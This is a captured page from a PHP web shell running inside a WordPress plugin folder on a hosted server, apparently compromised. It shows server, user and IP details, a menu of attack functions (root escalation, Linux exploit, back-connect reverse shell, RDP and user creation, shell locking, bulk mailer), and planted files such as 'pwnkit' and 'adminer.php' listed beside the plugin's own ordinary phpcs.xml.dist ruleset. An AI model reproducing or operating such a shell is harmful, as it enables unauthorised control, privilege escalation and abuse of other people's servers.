Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.16 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.4.33
dottorr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
dottorr /
www /
wp-content /
plugins /
ocean-extra /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
29.72
KB
-rw-r--r--
index.php
32
B
-rw-r--r--
ocean-extra.php
26.23
KB
-rw-r--r--
phpcs.xml.dist
1.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
40.85
KB
-rw-r--r--
wpml-config.xml
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset name="OceanExtra"> <description>Rules for Ocean Extra</description> <arg name="extensions" value="php" /> <exclude-pattern>*/vendor/*</exclude-pattern> <exclude-pattern>*/node_modules/*</exclude-pattern> <exclude-pattern>*/sass*/*</exclude-pattern> <exclude-pattern>*/build*/*</exclude-pattern> <exclude-pattern>*/assets*/*</exclude-pattern> <!-- Include the WordPress-Extra standard. --> <rule ref="WordPress-Extra"> <!-- We may want a middle ground though. The best way to do this is add the entire ruleset, then rule by rule, remove ones that don't suit a project. We can do this by running `phpcs` with the '-s' flag, which allows us to see the names of the sniffs reporting errors. Once we know the sniff names, we can opt to exclude sniffs which don't suit our project like so. --> <exclude name="WordPress.Files.FileName.InvalidClassFileName"/> <exclude name="WordPress.Files.FileName.NotHyphenatedLowercase"/> <exclude name="WordPress.NamingConventions.ValidVariableName.VariableNotSnakeCase"/> <exclude name="WordPress.Arrays.MultipleStatementAlignment.DoubleArrowNotAligned"/> <exclude name="WordPress.PHP.StrictInArray.MissingTrueStrict"/> <exclude name="Generic.Files.LineEndings" /> <exclude name="Generic.Formatting.MultipleStatementAlignment.NotSameWarning" /> <exclude name="Generic.Arrays.DisallowShortArraySyntax"/> </rule> <!-- Let's also check that everything is properly documented. --> <rule ref="WordPress-Docs"/> <rule ref="PHPCompatibility"/> <config name="minimum_supported_wp_version" value="5.0.0"/> <config name="testVersion" value="5.6-"/> <rule ref="WordPress.WP.I18n"> <properties> <property name="text_domain" value="ocean-extra"/> </properties> </rule> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <properties> <property name="prefixes" type="array"> <element value="oe"/> </property> </properties> </rule> </ruleset>
Close